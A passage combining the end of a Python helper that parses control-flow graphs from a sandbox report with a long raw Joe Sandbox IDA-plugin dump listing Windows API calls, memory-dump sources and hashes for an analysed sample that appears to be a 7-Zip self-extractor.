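    return sorted(b.node_id for b in cfg.blocks.values() if api in b.apis)


def apis_before(cfg, node_id):
    """API names that can run on some entry-to-node_id path (the node itself excluded)."""
    ancestors = (_walk(node_id, cfg.adjacency(reverse=True)) - {node_id}) & reachable(cfg)
    return {api for n in ancestors for api in cfg.blocks[n].apis}


# Sample: the graph of the GetFileAttributesW function, copied from the report above
SAMPLE = ("control_flow_graph 1361 403387-40339e GetFileAttributesW 1362 4033a0-4033a2 "
          "1361->1362 1363 4033a4-4033a6 1361->1363 1364 4033fd-4033ff 1362->1364 "
          "1365 4033b5-4033bc 1363->1365 1366 4033a8-4033b3 SetLastError 1363->1366 "
          "1367 4033c7-4033ca 1365->1367 1368 4033be-4033c5 call 40335a 1365->1368 "
          "1366->1364 1369 4033fa-4033fc 1367->1369 1370 4033cc-4033dd FindFirstFileW "
          "1367->1370 1368->1364 1369->1364 1370->1368 1372 4033df-4033f8 FindClose "
          "CompareFileTime 1370->1372 1372->1368 1372->1369")

# Constructed two-block input that carries "call <hex>" targets made of decimal digits
CALL_SAMPLE = "control_flow_graph 826 401831-40185c call 401132 call 41017a 827 401827-40182c 826->827"

if __name__ == "__main__":
    cfg = parse_cfg(SAMPLE)
    print(len(cfg.blocks), "blocks,", len(cfg.edges), "edges,", len(reachable(cfg)), "reachable")
    for nid in blocks_calling(cfg, "CompareFileTime"):
        print(f"block {nid} @ {cfg.blocks[nid].start:#x}: preceded by", sorted(apis_before(cfg, nid)))
```

Pasting a whole function's graph from the report into `parse_cfg` gives the same view the IDA plugin rendered: the entry block, any blocks the dump leaves unreachable, and the API order along a path, which is what you need when deciding whether a block that reaches an interesting API (here FindFirstFileW before CompareFileTime) is guarded by an earlier check.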
                                                                    APIs
                                                                    • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                    • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeMessageSendSpace
                                                                    • String ID:
                                                                    • API String ID: 696007252-0
                                                                    • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                    • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                    • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                    • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

                                                                    Control-flow Graph (function at 00403400)
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: 0VA$SetEnvironment${\rtf
                                                                    • API String ID: 613200358-2390373888
                                                                    • Opcode ID: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                    • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                    • Opcode Fuzzy Hash: dcf90fe6618ce088b1c97014d150c8774d1fa3f0332cc52eb9164848a73b118e
                                                                    • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

                                                                    Control-flow Graph (function at 00404F67)
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404F8B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                    • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                    • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                    • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                    • String ID: $gA
                                                                    • API String ID: 2700081640-3949116232
                                                                    • Opcode ID: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                    • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                    • Opcode Fuzzy Hash: 7a72f8255ffad39a45084592af3b4b21038dbbce693df37f494211c98472705d
                                                                    • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                    • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                    • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                    • DispatchMessageW.USER32(?), ref: 00401D73
                                                                    • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                    • String ID: Static
                                                                    • API String ID: 2479445380-2272013587
                                                                    • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                    • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                    • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                    • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

                                                                    Control-flow Graph (function at 004036F1)
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                    • String ID:
                                                                    • API String ID: 846840743-0
                                                                    • Opcode ID: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                    • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                    • Opcode Fuzzy Hash: c5e686f7f8817ede9d702b9a32d8664ca79c34d2077dd9b3290cdad50fb96ab2
                                                                    • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                                    Control-flow Graph (function at 0040F227)
                                                                    APIs
                                                                    • _EH_prolog.MSVCRT ref: 0040F230
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                      • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$H_prolog
                                                                    • String ID: pmA${D@
                                                                    • API String ID: 3431946709-901781089
                                                                    • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                    • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                    • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                    • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                                    Control-flow Graph (function at 00401B75)
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                    • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                    • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                    • String ID: k7@
                                                                    • API String ID: 635176117-1561861239
                                                                    • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                    • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                    • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                    • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                                    Control-flow Graph (function at 0040E9EF)
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID: DmA${D@
                                                                    • API String ID: 1033339047-1777112864
                                                                    • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                    • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                    • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                    • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                    • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@memcpymemmove
                                                                    • String ID:
                                                                    • API String ID: 3549172513-0
                                                                    • Opcode ID: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                    • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                    • Opcode Fuzzy Hash: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                    • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                      • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00928E78,00404926), ref: 0040224B
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00928E78), ref: 0040225B
                                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                      • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                      • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00928E78,00000002), ref: 00402334
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                    • wsprintfW.USER32 ref: 004049B0
                                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                    • String ID: 7zSfxFolder%02d
                                                                    • API String ID: 3387708999-2820892521
                                                                    • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                    • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                    • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                    • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                    • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                    • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                    • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlenmemcmp$memmove
                                                                    • String ID:
                                                                    • API String ID: 3251180759-0
                                                                    • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                    • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                    • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                    • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                      • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1731127917-0
                                                                    • Opcode ID: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                    • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                    • Opcode Fuzzy Hash: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                    • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                    • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                      • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                      • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                      • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                      • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                      • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                    • String ID:
                                                                    • API String ID: 359084233-0
                                                                    • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                    • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                    • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                    • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                    • wsprintfW.USER32 ref: 004045BB
